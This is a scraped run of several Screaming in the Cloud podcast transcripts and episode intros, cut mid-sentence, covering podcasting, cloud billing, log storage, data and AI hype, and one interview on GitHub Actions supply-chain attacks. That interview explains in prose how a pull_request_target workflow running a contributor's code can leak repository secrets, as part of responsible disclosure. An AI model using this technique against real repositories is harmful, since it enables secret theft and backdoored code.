‘RTO’ as they start slipping into the office, but I started working from home almost a decade ago, and there aren’t too many podcasts that fit into the walk from the kitchen to my home office. Like great, give me everything you want me to know in about three-and-a-half seconds. Go… and we’re done. It doesn’t work. So, I’m a producer, but I don’t consume my own content, which I think generally is something you only otherwise see in, you know, drug dealers.Chris: Yeah. Well, and I mean, I think a lot of professional media, like, you get to a point where you’re so busy and you’re creating so much content that it’s hard to sit down and review your own stuff. I mean, even at HumblePod, I’m in a place where we’re producing our own show now called We Built This Brand, and I end up in a place where some weeks I’m like, “I can’t review this. I approve it. You send it out, I trust you.” So, Corey, I’m starting to echo you in a lot of ways and it’s just—it makes me laugh from time to time.Corey: Somewhat recently, I wound up yet again, having to do a check on, “Hey, you use HumblePod for your podcasting work. Do you like them?” And it’s fun. It’s almost like when someone reaches out about someone you used to work with. Like, “We’re debating hiring this person. Should we?” And I love being able to give the default response for the people I’ve worked with for this long, which is, “Shut up and hire them. Why are you talking to me and not hiring them faster? Get on with it.”Because I’m a difficult customer. I know that. The expectations I have are at times unreasonably high. And the fact that I don’t talk to you nearly as much as I used to shows that this all has been working. Because there was a time we talked multiple times a day back—Chris: Mm-hm.Corey: When I had no idea what I was doing. Now, 500-some-odd episodes in, I still have no idea what I’m doing, but by God, I’ve gotten it down to a science.Chris: Absolutely you have. And you know, technically we’re over 1000 episodes together, I think, at this point because if you combine what you’re doing with Screaming in the Cloud, with Last Week in AWS slash AWS Morning Brief, yeah, we’ve done a lot with you. But yes, you’ve come a long way.Corey: Yes, I have become the very whitest of guys. It works out well. It’s like, one podcast isn’t enough. We’re going to have two of them. But it’s easy to talk about the past. Let’s talk instead about the future a little bit. What does the future of podcasting look like? I mean, one easy direction to go in with this, as you just mentioned, there’s over 1000 episodes of me flapping my gums in the breeze. That feels like it’s more than enough data to train an AI model to basically be me without all the hard work, but somehow I kind of don’t see it happening anytime soon.Chris: Yeah, I think listeners still value authenticity a lot and I think that’s one of the hard things you’re seeing in podcasting as a whole is that these organizations come in and they’re like, “We’re going to be the new podcast killer,” or, “We’re going to be the next thing for podcasting,” and if it’s too overproduced, too polished, like, I think people can detect that and see that inauthenticity, which is why, like, AI coming in and taking over people’s voices is so crazy. One of the things that’s happening right now at Spotify is that they are beta testing translation software so that Screaming in the Cloud could automatically be in Spanish or Last Week in AWS could automatically be in French or what have you. It’s just so surreal to me that they’re doing this, but they’re doing exactly what you said. It’s language learning models that understand what the host is saying and then they’re translating it into another language.The problem is, what if that automation gets that word wrong? You know how bad one wrong word could be, translating from Spanish or French or any other language from English. So, there’s a lot of challenges to be met there. And then, of course, you know, once they’ve got your voice, what do they do with it? There’s a lot of risk there.Corey: The puns don’t translate very well, most of the time, either.Chris: Oh, yes.Corey: Especially when I mis-intentionally mispronounce words like Ku-BER-netees.Chris: Exactly. I mean, it’s going to be
John Wynkoop, Cloud Economist & Platypus Herder at The Duckbill Group, joins Corey on Screaming in the Cloud to discuss why he decided to make a career move and become an AWS billing consultant. Corey and John discuss how once you’re deeply familiar with one cloud provider, those skills become transferable to other cloud providers as well. John also shares the trends he has seen post-pandemic in the world of cloud, including the increased adoption of a multi-cloud strategy and the need for costs control even for VC-funded start-ups. About JohnWith over 25 years in IT, John’s done almost every job in the industry, from running cable and answering helpdesk calls to leading engineering teams and advising the C-suite. Before joining The Duckbill Group, he worked across multiple industries including private sector, higher education, and national defense. Most recently he helped IGNW, an industry leading systems integration partner, get acquired by industry powerhouse CDW. When he’s not helping customers spend smarter on their cloud bill, you can find him enjoying time with his family in the beautiful Smoky Mountains near his home in Knoxville, TN.Links Referenced: The Duckbill Group: LinkedIn: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. And the times, they are changing. My guest today is John Wynkoop. John, how are you?John: Hey, Corey, I’m doing great. Thanks for having me.Corey: So, big changes are afoot for you. You’ve taken a new job recently. What are you doing now?John: Well [laugh], so I’m happy to say I have joined The Duckbill Group as a cloud economist. So, came out of the big company world, and have dived back in—or dove back into the startup world.Corey: It’s interesting because when we talk to those big companies, they always identify us as oh, you’re a startup, which is hilarious on some level because our AWS account hangs out in AWS’s startup group, but if you look at the spend being remarkably level from month to month to month to year to year to year, they almost certainly view us as they’re a startup, but they suck at it. They completely failed. And so, many of the email stuff that you get from them presupposes that you’re venture-backed, that you’re trying to conquer the entire world. We don’t do that here. We have this old-timey business model that our forebears would have understood of, we make more money than we spend every month and we continue that trend for a long time. So first, thanks for joining us, both on the show and at the company. We like having you around.John: Well, thanks. And yeah, I guess that’s—maybe a startup isn’t the right word to describe what we do here at The Duckbill Group, but as you said, it seems to fit into the industry classification. But that was one of the things I actually really liked about the—that was appealing about joining the team was, we do spend less than we make and we’re not after hyper-growth and we’re not trying to consume everything.Corey: So, it’s interesting when you put a job description out into the world and you see who applies—and let’s be clear, for those who are unaware, job descriptions are inherently aspirational shopping lists. If you look at a job description and you check every box on the thing and you’ve done all the things they want, the odds are terrific you’re going to be bored out of your mind when you wind up showing up to do these… whatever that job is. You should be learning stuff and growing. At least that’s always been my philosophy to it. One of the interesting things about you is that you checked an awful lot of boxes, but there is one that I think would cause people to raise an eyebrow, which is, you’re relatively new to the fun world of AWS.John: Yeah. So, obviously I, you know, have been around the block a few times when it comes to cloud. I’ve used AWS, built some things in AWS, but I wouldn’t have classified myself as an AWS guru by any stretch of the imagination. I spent the last probably three years working in Google Cloud, helping customers build and deploy solutions there, but I do at least understand the fundamentals of cloud, and more importantly—at least for our customers—cloud costs because at the end of the day, they’re not all that different.Corey: I do want to call out that you have a certain humility to you which I find endearing. But you’re not allowed to do that here; I will sing your praises for you. Before they deprecated it like they do almost everything else, you were one of the relatively few Google Cloud Certified Fellows, which was sort of like their Heroes program only, you know, they killed it in favor of something else like there’s a Champion program or whatnot. You are very deep in the world of both Kubernetes and Google Cloud.John: Yeah. So, there was a few of us that were invited to come out and help Google pilot that program in, I believe it was 2019, and give feedback to help them build the Cloud Fellows Program. And thankfully, I was selected based on some of our early experience with Anthos, and specifically, it was around Certified Fellow in what they call hybrid multi-cloud, so it was experience around Anthos. Or at the time, they hadn’t called it Anthos; they were calling it CSP or Cloud Services Platform because that’s not an overloaded acronym. So yeah, definitely, was very humbled to be part of that early on.I think the program, as you said, grew to about 70 or so maybe 100 certified individuals before they transitioned—not killed—transitioned to that program into the Cloud Champions program. So, those folks are all still around, myself included. They’ve just now changed the moniker. But we all get to use the old title still as well, so that’s kind of cool.Corey: I have to ask, what would possess you to go from being one of the best in the world at using Google Cloud over here to our corner of the AWS universe? Because the inverse, if I were to somehow get ejected from here—which would be a neat trick, but I’m sure it’s theoretically possible—like, “What am I going to do now?” I would almost certainly wind up doing something in the AWS ecosystem, just due to inertia, if nothing else. You clearly didn’t see things quite that way. Why make the switch?John: Well, a couple of different reasons. So, being at a Google partner presents a lot of challenges and one of the things that was supremely interesting about coming to Duckbill is that we’re independent. So, we’re not an AWS partner. We are an independent company that is beholden only to our customers. And there isn’t anything like that in the Google ecosystem today.There’s, you know, there’s Google partners and then there’s Google customers and then there’s Google. So, that was part of the appeal. And the other thing was, I enjoy learning new things, and honestly, learning, you know, into the depths of AWS cost hell is interesting. There’s a lot to learn there and there’s a lot of things that we can extract and use to help customers spend less. So, that to me was super interesting.And then also, I want to help build an organization. So, you know, I think what we’re doing here at The Duckbill Group is cool and I think that there’s an opportunity to grow our services portfolio, and so I’m excited to work with the leadership team to see what else we can bring to market that’s going to help our customers, you know, not just with cost optimization, not just with contract negotiation, but you know, through the lifecycle of their AWS… journey, I guess we’ll call it.Corey: It’s one of those things where I always have believed, on some level, that once you’re deep in a particular cloud provider, if there’s reason for it, you can rescale relatively quickly to a different provider. There are nuances—deep nuances—that differ from provider to provider, but the underlying concepts generally all work the same way. There’s only so many ways you can have data go from point A to point B. There’s only so many ways to spin up a bunch of VMs and whatnot. And you’re proof-positive that theory was correct.You’d been here less than a week before I started learning nuances about AWS billing from you. I think it was something to do with the way that late fees are assessed when companies don’t pay Amazon as quickly as Amazon desires. So, we’re all learning new things constantly and no one stuffs this stuff all into their head. But that, if nothing else, definitely cemented that yeah, we’ve got the right person in the seat.John: Yeah, well, thanks. And certainly, the deeper you go on a specific cloud provider, things become fresh in your memory, you know, other cached so to speak. So, coming up to speed on AWS has been a little bit more documentation reading than it would have been, if I were, say, jumping right into a GCP engagement. But as he said, at the end of the day, there’s a lot of similarities. Obviously understanding the nuances of, for example, account organization versus, you know, GCP’s Project and Folders. Well, that’s a substantial difference and so there’s a lot of learning that has to happen.Thankfully, you know, all these companies, maybe with the exception of Oracle, have done a really good job of documenting all of the concepts in their publicly available documentation. And then obviously, having a team of experts here at The Duckbill Group to ask stupid questions of doesn’t hurt. But definitely, it’s not as hard to come up to speed as one may think, once you’ve got it understood in one provider.Corey: I took a look recently and was kind of surprised to discover that I’ve been doin
Seif Lotfy, Co-Founder and CTO at Axiom, joins Corey on Screaming in the Cloud to discuss how and why Axiom has taken a low-cost approach to event data. Seif describes the events that led to him helping co-found a company, and explains why the team wrote all their code from scratch. Corey and Seif discuss their views on AWS pricing, and Seif shares his views on why AWS doesn’t have to compete on price. Seif also reveals some of the exciting new products and features that Axiom is currently working on. About SeifSeif is the bubbly Co-founder and CTO of Axiom where he has helped build the next generation of logging, tracing, and metrics. His background is at Xamarin, and Deutche Telekom and he is the kind of deep technical nerd that geeks out on white papers about emerging technology and then goes to see what he can build.Links Referenced: Axiom: Twitter: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. This promoted guest episode is brought to us by my friends, and soon to be yours, over at Axiom. Today I’m talking with Seif Lotfy, who’s the co-founder and CTO of Axiom. Seif, how are you?Seif: Hey, Corey, I am very good, thank you. It’s pretty late here, but it’s worth it. I’m excited to be on this interview. How are you today?Corey: I’m not dead yet. It’s weird, I see you at a bunch of different conferences, and I keep forgetting that you do in fact live half a world away. Is the entire company based in Europe? And where are you folks? Where do you start and where do you stop geographically? Let’s start there. We over—everyone dives right into product. No, no, no. I want to know where in the world people sit because apparently, that’s the most important thing about a company in 2023.Seif: Unless you ask Zoom because they’re undoing whatever they did. We’re from New Zealand, all the way to San Francisco, and everything in between. So, we have people in Egypt and Nigeria, all around Europe, all around the US… and UK, if you don’t consider it Europe anymore.Corey: Yeah, it really depends. There’s a lot of unfortunate naming that needs to get changed in the wake of that.Seif: [laugh].Corey: But enough about geopolitics. Let’s talk about industry politics. I’ve been a fan of Axiom for a while and I was somewhat surprised to realize how long it had been around because I only heard about you folks a couple of years back. What is it you folks do? Because I know how I think about what you’re up to, but you’ve also gone through some messaging iteration, and it is a near certainty that I am behind the times.Seif: Well, at this point, we just define ourselves as the best home for event data. So, Axiom is the best home for event data. We try to deal with everything that is event-based, so time-series. So, we can talk metrics, logs, traces, et cetera. And right now predominantly serving engineering and security.And we’re trying to be—or we are—the first cloud-native time-series platform to provide streaming search, reporting, and monitoring capabilities. And we’re built from the ground up, by the way. Like, we didn’t actually—we’re not using Parquet [unintelligible 00:02:36] thing. We’re completely everything from the ground up.Corey: When I first started talking to you folks a few years back, there were two points to me that really stood out, and I know at least one of them still holds true. The first is that at the time, you were primarily talking about log data. Just send all your logs over to Axiom. The end. And that was a simple message that was simple enough that I could understand it, frankly.Because back when I was slinging servers around and you know breaking half of them, logs were effectively how we kept track of what was going on, where. These days, it feels like everything has been repainted with a very broad brush called observability, and the takeaway from most company pitches has been, you must be smarter than you are to understand what it is that we’re up to. And in some cases, you scratch below the surface and realize it no, they have no idea what they’re talking about either and they’re really hoping you don’t call them on that.Seif: It’s packaging.Corey: Yeah. It is packaging and that’s important.Seif: It’s literally packaging. If you look at it, traces and logs, these are events. There's a timestamp and just data with it. It’s a timestamp and data with it, right? Even metrics is all the way to that point.And a good example, now everybody’s jumping on [OTel 00:03:46]. For me, OTel is nothing else, but a different structure for time series, for different types of time series, and that can be used differently, right? Or at least not used differently but you can leverage it differently.Corey: And the other thing that you did that was interesting and is a lot, I think, more sustainable as far as [moats 00:04:04] go, rather than things that can be changed on a billboard or whatnot, is your economic position. And your pricing has changed around somewhat, but I ran a number of analyses on your cost that you were passing on to customers and my takeaway was that it was a little bit more expensive to store data for logs in Axiom than it was to store it in S3, but not by much. And it just blew away the price point of everything else focused around logs, including AWS; you’re paying 50 cents a gigabyte to ingest CloudWatch logs data over there. Other companies are charging multiples of that and Cisco recently bought Splunk for $28 billion because it was cheaper than paying their annual Splunk bill. How did you get to that price point? Is it just a matter of everyone else being greedy or have you done something different?Seif: We looked at it from the perspective of… so there’s the three L’s of logging. I forgot the name of the person at Netflix who talked about that, but basically, it’s low costs, low latency, large scale, right? And you will never be able to fulfill all three of them. And we decided to work on low costs and large scale. And in terms of low latency, we won’t be low as others like ClickHouse, but we are low enough. Like, we’re fast enough.The idea is to be fast enough because in most cases, I don’t want to compete on milliseconds. I think if the user can see his data in two seconds, he’s happy. Or three seconds, he’s happy. I’m not going to be, like, one to two seconds and make the cost exponentially higher because I’m one second faster than the other. And that’s, I think, that the way we approached this from day one.And from day one, we also started utilizing the idea of existence of Open—Object Storage, we have our own compressions, our own encodings, et cetera, from day one, too, so and we still stick to that. That’s why we never converted to other existing things like Parquet. Also because we are a Schema-On-Read, which Parquet doesn’t allow you really to do. But other than that, it’s… from day one, we wanted to save costs by also making coordination free. So, ingest has to be coordination free, right, because then we don’t run a shitty Kafka, like, honestly a lot—a lot of the [logs 00:06:19] companies who running a Kafka in front of it, the Kafka tax reflects in what they—the bill that you’re paying for them.Corey: What I found fun about your pricing model is it gets to a point that for any reasonable workload, how much to log or what to log or sample or keep everything is no longer an investment decision; it’s just go ahead and handle it. And that was originally what you wound up building out. Increasingly, it seems like you’re not just the place to send all the logs to, which to be honest, I was excited enough about that. That was replacing one of the projects I did a couple of times myself, which is building highly available, fault-tolerant, rsyslog clusters in data centers. Okay, great, you’ve gotten that unlocked, the economics are great, I don’t have to worry about that anymore.And then you started adding interesting things on top of it, analyzing things, replaying events that happen to other players, et cetera, et cetera, it almost feels like you’re not just a storage depot, but you also can forward certain things on under a variety of different rules or guises and format them as whatever on the other side is expecting them to be. So, there’s a story about integrating with other observability vendors, for example, and only sending the stuff that’s germane and relevant to them since everyone loves to charge by ingest.Seif: Yeah. So, we did this one thing called endpoints, the number one. Endpoints was a beginning where we said, “Let’s let people send us data using whatever API they like using, let’s say Elasticsearch, Datadog, Honeycomb, Loki, whatever, and we will just take that data and multiplex it back to them.” So, that’s how part of it started. This allows us to see, like, how—allows customers to see how we compared to others, but then we took it a bit further and now, it’s still in closed invite-only, but we have Pipelines—codenamed Pipelines—which allows you to send data to us and we will keep it as a source of truth, then we will, given specific rules, we can then ship it anywhere to a different destination, right, and this allows you just to, on the fly, send specific filter things out to, I don’t know, a different vendor or even to S3 or you could send it to Splunk. But at the same time, you can—because we have all your data, you can go back in the past, if the incident happens and replay that completely into a different product.Corey: I would say that there’s a definite approach to observability, from the perspective of every company ten
Adnan Khan, Lead Security Engineer at Praetorian, joins Corey on Screaming in the Cloud to discuss software bill of materials and supply chain attacks. Adnan describes how simple pull requests can lead to major security breaches, and how to best avoid those vulnerabilities. Adnan and Corey also discuss the rapid innovation at Github Actions, and the pros and cons of having new features added so quickly when it comes to security. Adnan also discusses his view on the state of AI and its impact on cloud security. About AdnanAdnan is a Lead Security Engineer at Praetorian. He is responsible for executing on Red-Team Engagements as well as developing novel attack tooling in order to meet and exceed engagement objectives and provide maximum value for clients.His past experience as a software engineer gives him a deep understanding of where developers are likely to make mistakes, and has applied this knowledge to become an expert in attacks on organization’s CI/CD systems.Links Referenced: Praetorian: Twitter: Praetorian blog posts: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Are you navigating the complex web of API management, microservices, and Kubernetes in your organization? is here to be your guide to connectivity in the cloud-native universe!, the powerhouse behind Istio, is revolutionizing cloud-native application networking. They brought you Gloo Gateway, the lightweight and ultra-fast gateway built for modern API management, and Gloo Mesh Core, a necessary step to secure, support, and operate your Istio environment.Why struggle with the nuts and bolts of infrastructure when you can focus on what truly matters - your application.’s got your back with networking for applications, not infrastructure. Embrace zero trust security, GitOps automation, and seamless multi-cloud networking, all with here’s the real game-changer: a common interface for every connection, in every direction, all with one API. It’s the future of connectivity, and it’s called Gloo by and Platform Engineers, your journey to a seamless cloud-native experience starts here. Visit today and level up your networking game.Corey: As hybrid cloud computing becomes more pervasive, IT organizations need an automation platform that spans networks, clouds, and services—while helping deliver on key business objectives. Red Hat Ansible Automation Platform provides smart, scalable, sharable automation that can take you from zero to automation in minutes. Find it in the AWS Marketplace.Corey: Welcome to Screaming in the Cloud, I’m Corey Quinn. I’ve been studiously ignoring a number of buzzword, hype-y topics, and it’s probably time that I addressed some of them. One that I’ve been largely ignoring, mostly because of its prevalence at Expo Hall booths at RSA and other places, has been software bill of materials and supply chain attacks. Finally, I figured I would indulge the topic. Today I’m speaking with Adnan Khan, lead security engineer at Praetorian. Adnan, thank you for joining me.Adnan: Thank you so much for having me.Corey: So, I’m trying to understand, on some level, where the idea of these SBOM or bill-of-material attacks have—where they start and where they stop. I’ve seen it as far as upstream dependencies have a vulnerability. Great. I’ve seen misconfigurations in how companies wind up configuring their open-source presences. There have been a bunch of different, it feels almost like orthogonal concepts to my mind, lumped together as this is a big scary thing because if we have a big single scary thing we can point at, that unlocks budget. Am I being overly cynical on this or is there more to it?Adnan: I’d say there’s a lot more to it. And there’s a couple of components here. So first, you have the SBOM-type approach to security where organizations are looking at which packages are incorporated into their builds. And vulnerabilities can come out in a number of ways. So, you could have software actually have bugs or you could have malicious actors actually insert backdoors into software.I want to talk more about that second point. How do malicious actors actually insert backdoors? Sometimes it’s compromising a developer. Sometimes it’s compromising credentials to push packages to a repository, but other times, it could be as simple as just making a pull request on GitHub. And that’s somewhere where I’ve spent a bit of time doing research, building off of techniques that other people have documented, and also trying out some attacks for myself against two Microsoft repositories and several others that have reported over the last few months that would have been able to allow an attacker to slip a backdoor into code and expand the number of projects that they are able to attack beyond that.Corey: I think one of the areas that we’ve seen a lot of this coming from has been the GitHub Action space. And I’ll confess that I wasn’t aware of a few edge-case behaviors around this. Most of my experience with client-side Git configuration in the .git repository—pre-commit hooks being a great example—intentionally and by design from a security perspective, do not convey when you check that code in and push it somewhere, or grab someone else’s, which is probably for the best because otherwise, it’s, “Oh yeah, just go ahead and copy your password hash file and email that to something else via a series of arcane shell script stuff.” The vector is there. I was unpleasantly surprised somewhat recently to discover that when I cloned a public project and started running it locally and then adding it to my own fork, that it would attempt to invoke a whole bunch of GitHub Actions flows that I’d never, you know, allowed it to do. That was… let’s say, eye-opening.Adnan: [laugh]. Yeah. So, on the particular topic of GitHub Actions, the pull request as an attack vector, like, there’s a lot of different forms that an attack can take. So, one of the more common ones—and this is something that’s been around for just about as long as GitHub Actions has been around—and this is a certain trigger called ‘pull request target.’ What this means is that when someone makes a pull request against the base repository, maybe a branch within the base repository such as main, that will be the workflow trigger.And from a security’s perspective, when it runs on that trigger, it does not require approval at all. And that’s something that a lot of people don’t really realize when they’re configuring their workflows. Because normally, when you have a pull request trigger, the maintainer can check a box that says, “Oh, require approval for all external pull requests.” And they think, “Great, everything needs to be approved.” If someone tries to add malicious code to run that’s on the pull request target trigger, then they can look at the code before it runs and they’re fine.But in a pull request target trigger, there is no approval and there’s no way to require an approval, except for configuring the workflow securely. So, in this case, what happens is, and in one particular case against the Microsoft repository, this was a Microsoft reusable GitHub Action called GPT Review. It was vulnerable because it checked out code from my branch—so if I made a pull request, it checked out code from my branch, and you could find this by looking at the workflow—and then it ran tests on my branch, so it’s running my code. So, by modifying the entry points, I could run code that runs in the context of that base branch and steal secrets from it, and use those to perform malicious Actions.Corey: Got you. It feels like historically, one of the big threat models around things like this is al—[and when 00:06:02] you have any sort of CI/CD exploit—is either falls down one of two branches: it’s either the getting secret access so you can leverage those credentials to pivot into other things—I’ve seen a lot of that in the AWS space—or more boringly, and more commonly in many cases, it seems to be oh, how do I get it to run this crypto miner nonsense thing, with the somewhat large-scale collapse of crypto across the board, it’s been convenient to see that be less prevalent, but still there. Just because you’re not making as much money means that you’ll still just have to do more of it when it’s all in someone else’s account. So, I guess it’s easier to see and detect a lot of the exploits that require a whole bunch of compute power. The, oh by the way, we stole your secrets and now we’re going to use that to lateral into an organization seem like it’s something far more… I guess, dangerous and also sneaky.Adnan: Yeah, absolutely. And you hit the nail on the head there with sneaky because when I first demonstrated this, I made a test account, I created a PR, I made a couple of Actions such as I modified the name of the release for the repository, I just put a little tag on it, and didn’t do any other changes. And then I also created a feature branch in one of Microsoft’s repositories. I don’t have permission to do that. That just sat there for about almost two weeks and then someone else exploited it and then they responded to it.So, sneaky is exactly the word you could describe something like this. And another reason why it’s concerning is, beyond the secret disclosure for—and in this case, the repository only had an OpenAI API key, so… okay, you can talk to ChatGPT for free. But this was itself a Github Action and it was used by another Microsoft machine-learning project that had a lot mo
Joe Karlsson, Data Engineer at Tinybird, joins Corey on Screaming in the Cloud to discuss what it’s like working in the world of data right now and how he manages the overlap between his social media presence and career. Corey and Joe chat about the rise of AI and whether or not we’re truly seeing advancements in that realm or just trendy marketing plays, and Joe shares why he feels data is getting a lot more attention these days and what it’s like to work in data at this time. Joe also shares insights into how his mental health has been impacted by having a career and social media presence that overlaps, and what steps he’s taken to mitigate the negative impact. About JoeJoe Karlsson (He/They) is a Software Engineer turned Developer Advocate at Tinybird. He empowers developers to think creatively when building data intensive applications through demos, blogs, videos, or whatever else developers need.Joe's career has taken him from building out database best practices and demos for MongoDB, architecting and building one of the largest eCommerce websites in North America at Best Buy, and teaching at one of the most highly-rated software development boot camps on Earth. Joe is also a TEDx Speaker, film buff, and avid TikToker and Tweeter.Links Referenced: Tinybird: Personal website: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Are you navigating the complex web of API management, microservices, and Kubernetes in your organization? is here to be your guide to connectivity in the cloud-native universe!, the powerhouse behind Istio, is revolutionizing cloud-native application networking. They brought you Gloo Gateway, the lightweight and ultra-fast gateway built for modern API management, and Gloo Mesh Core, a necessary step to secure, support, and operate your Istio environment.Why struggle with the nuts and bolts of infrastructure when you can focus on what truly matters - your application.’s got your back with networking for applications, not infrastructure. Embrace zero trust security, GitOps automation, and seamless multi-cloud networking, all with here’s the real game-changer: a common interface for every connection, in every direction, all with one API. It’s the future of connectivity, and it’s called Gloo by and Platform Engineers, your journey to a seamless cloud-native experience starts here. Visit today and level up your networking game.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn and I am joined today by someone from well, we’ll call it the other side of the tracks, if I can—Joe: [laugh].Corey: —be blunt and disrespectful. Joe Karlsson is a data engineer at Tinybird, but I really got to know who he is by consistently seeing his content injected almost against my will over on the TikToks. Joe, how are you?Joe: I’m doing so well and I’m so sorry for anything I’ve forced down your throat online. Thanks for having me, though.Corey: Oh, it’s always a pleasure to talk to you. No, the problem I’ve got with it is that when I’m in TikTok mode, I don’t want to think about computers anymore. I want to find inane content that I can just swipe six hours away without realizing it because that’s how I roll.Joe: TikTok is too smart, though. I think it knows that you are doing a lot of stuff with computers and even if you keep swiping away, it’s going to keep serving it up to you.Corey: For a long time, it had me pinned as a lesbian, which was interesting. Which I suppose—Joe: [laugh]. It happened to me, too.Corey: Makes sense because I follow a lot of women who are creators in comics and the rest, but I’m not interested in the thirst trap approach. So, it’s like, “Mmm, this codes as lesbian.” Then they started showing me ads for ADHD, which I thought was really weird until I’m—oh right. I’m on TikTok. And then they started recommending people that I’m surprised was able to disambiguate until I realized these people have been at my house and using TikTok from my IP address, which probably is going to get someone murdered someday, but it’s probably easy to wind up doing an IP address match.Joe: I feel like I have to, like, separate what is me and what is TikTok, like, trying to serve it up because I’ve been on lesbian TikTok, too, ADHD, autism, like TikTok. And, like, is this who I am? I don’t know. [unintelligible 00:02:08] bring it to my therapist.Corey: You’re learning so much about yourself based upon an algorithm. Kind of wild, isn’t it?Joe: [laugh]. Yeah, I think we may be a little, like, neuro-spicy, but I think it might be a little overblown with what TikTok is trying to diagnose us with. So, it’s always good to just keep it in check, you know?Corey: Oh, yes. So, let’s see, what’s been going on lately? We had Google Next, which I think the industry largely is taking not seriously enough. For years, it felt like a try-hard, me too version of re:Invent. And this year, it really feels like it’s coming to its own. It is defining itself as something other than oh, us too.Joe: I totally agree. And that’s where you and I ran into recently, too. I feel like post-Covid I’m still, like, running into people I met on the internet in real life, and yeah, I feel like, yeah, re:Invent and Google Next are, like, the big ones.I totally agree. It feels like—I mean, it’s definitely, like, heavily inspired by it. And it still feels like it’s a little sibling in some ways, but I do feel like it’s one of the best conferences I’ve been to since, like, a pre-Covid 2019 AWS re:Invent, just in terms of, like… who was there. The energy, the vibes, I feel like people were, like, having fun. Yeah, I don’t know, it was a great conference this year.Corey: Usually, I would go to Next in previous years because it was a great place to go to hang out with AWS customers. These days, it feels like it’s significantly more than that. It’s, everyone is using everything at large scale. I think that is something that is not fully understood. You talk to companies that are, like, Netflix, famously all in on AWS. Yeah, they have Google stuff, too.Everyone does. I have Google stuff. I have a few things in Azure, for God’s sake. It’s one of those areas where everything starts to diffuse throughout a company as soon as you hire employee number two. And that is, I think, the natural order of things. The challenge, of course, is the narrative people try and build around it.Joe: Yep. Oh, totally. Multi-cloud’s been huge for you know, like, starting to move up. And it’s impossible not to. It was interesting seeing, like, Google trying to differentiate itself from Azure and AWS. And, Corey, I feel like you’d probably agree with this, too, AI was like, definitely the big buzzword that kept trying to, like—Corey: Oh, God. Spare me. And I say that, as someone who likes AI, I think that there’s a lot of neat stuff lurking around and value hiding within generative AI, but the sheer amount of hype around it—and frankly—some of the crypto bros have gone crashing into the space, make me want to distance myself from it as far as humanly possible, just because otherwise, I feel like I get lumped in with that set. And I don’t want that.Joe: Yeah, I totally agree. I know it feels like it’s hard right now to, like, remain ungrifty, but, like, still, like—trying—I mean, everyone’s trying to just, like, hammer in an AI perspective into every product they have. And I feel like a lot of companies, like, still don’t really have a good use case for it. You’re still trying to, like, figure that out. We’re seeing some cool stuff.Honestly, the hard part for me was trying to differentiate between people just, like, bragging about OpenAI API addition they added to the core product or, like, an actual thing that’s, like, AI is at the center of what it actually does, you know what I mean? Everything felt like it’s kind of like tacked on some sort of AI perspective to it.Corey: One of the things that really is getting to me is that you have these big companies—Google and Amazon most notably—talk about how oh, well, we’ve actually been working with AI for decades. At this point, they keep trying to push out how long it’s been. It’s like, “Okay, then not for nothing, then why does”—in Amazon’s case—“why does Alexa suck? If you’ve been working on it for this long, why is it so bad at all the rest?” It feels like they’re trying to sprint out with a bunch of services that very clearly were not conceptualized until Chat-Gippity’s breakthrough.And now it’s oh, yeah, we’re there, too. Us, too. And they’re pivoting all the marketing around something that, frankly, they haven’t demonstrated excellence with. And I feel like they’re leaving a lot of their existing value proposition completely in the dust. It’s, your customers are not using you because of the speculative future, forward-looking AI things; it’s because you are able to solve business problems today in ways that are not highly speculative and are well understood. That’s not nothing and there needs to be more attention paid to that. And I feel like there’s this collective marketing tripping over itself to wrap itself in hype that does them no services.Joe: I totally agree. I feel like honestly, just, like, a marketing perspective, I feel like it’s distracting in a lot of ways. And I know it’s hot and it’s cool, but it’s like, I think it’s harder right now to, like, stay focused to what you’re actually doing well, as opposed to, like, trying to tack on some AI thing. And maybe that’s great. I don’t know.Maybe that’s—honestly, maybe you’re seeing some tractio
Jeff Geerling, Owner of Midwestern Mac, joins Corey on Screaming in the Cloud to discuss the importance of storytelling, problem-solving, and community in the world of cloud. Jeff shares how and why he creates content that can appeal to anybody, rather than focusing solely on the technical qualifications of his audience, and how that strategy has paid off for him. Corey and Jeff also discuss the impact of leading with storytelling as opposed to features in product launches, and what’s been going on in the Raspberry Pi space recently. Jeff also expresses the impact that community has on open-source companies, and reveals his take on the latest moves from Red Hat and Hashicorp. About JeffJeff is a father, author, developer, and maker. He is sometimes called "an inflammatory enigma".Links Referenced:Personal webpage: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. A bit off the beaten path of the usual cloud-focused content on this show, today I’m speaking with Jeff Geerling, YouTuber, author, content creator, enigma, and oh, so much more. Jeff, thanks for joining me.Jeff: Thanks for having me, Corey.Corey: So, it’s hard to figure out where you start versus where you stop, but I do know that as I’ve been exploring a lot of building up my own home lab stuff, suddenly you are right at the top of every Google search that I wind up conducting. I was building my own Kubernete on top of a Turing Pi 2, and sure enough, your teardown was the first thing that I found that, to be direct, was well-documented, and made it understandable. And that’s not the first time this year that that’s happened to me. What do you do exactly?Jeff: I mean, I do everything. And I started off doing web design and then I figured that design is very, I don’t know, once it started transitioning to everything being JavaScript, that was not my 